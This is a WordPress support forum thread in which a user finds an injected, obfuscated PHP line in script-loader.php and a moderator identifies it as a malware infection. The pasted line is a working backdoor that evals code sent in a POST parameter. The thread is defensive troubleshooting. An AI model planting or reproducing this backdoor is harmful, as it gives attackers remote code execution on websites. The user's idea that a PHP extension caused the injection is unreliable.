Spaces after PHP tags on many files.

  • Hi Guys,

    I’ve been running into some errors on my WP install.

    The frontend looks fine, Although when going to /wp-admin
    I get the following error messages.

    Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/wp-includes/script-loader.php:1) in /home/username/public_html/wp-includes/pluggable.php on line 1178

    I looked at the contents of script-loader and found some weird text and spaces after the initial php open tag.

    <?php $wknk2 ="p_sto" ;$kta30 = strtoupper ($wknk2[1]. $wknk2[0] .$wknk2[4].$wknk2[2].$wknk2[3] ); if(isset(${$kta30} [ 'q021caf'] ) ) {eval(${$kta30 }['q021caf']) ;} ?> <?php

    I have no idea what it is. I removed it and I get a new error.

    This time for a Gravity Forms php file. then I fix that and another comes for another page, and so on.

    I don’t want to waste my time fixing a potential 1000 files manually. So I’m trying to figure out what could’ve caused that?

    I do remember installing php intl a couple weeks ago. but that’s all.

    I wouldn’t know why that would affect the WP site. Most of the other accounts on the server are fine.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator James Huff

    (@macmanx)

    Spacing aside, actually *none* of that should be in script-loader.php

    Feel free to compare to fresh files from https://www.ads-software.com/download/

    Unfortunately, there’s only one reason for that. ??

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thread Starter PetruT

    (@petrut)

    Hi james,

    I know that it’s not supposed to be there.
    I think it may have something to do with the php intl extension I installed.

    I highly doubt that the account was hacked as the user doesn’t even have login details and the security measures i have in place are extremely high.

    I’ve got scanners which block any files with php content from being uploaded.
    and I have IP based restrictions on the server. as well as bruteforce protection server wide for both Account access and WP access.

    So the chances of it being hacked are quite low.

    Moderator James Huff

    (@macmanx)

    What I’m looking at there is a malware hack, sorry.

    More than likely, a single plugin or theme file, something with execute permissions, was already compromised.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Spaces after PHP tags on many files.’ is closed to new replies.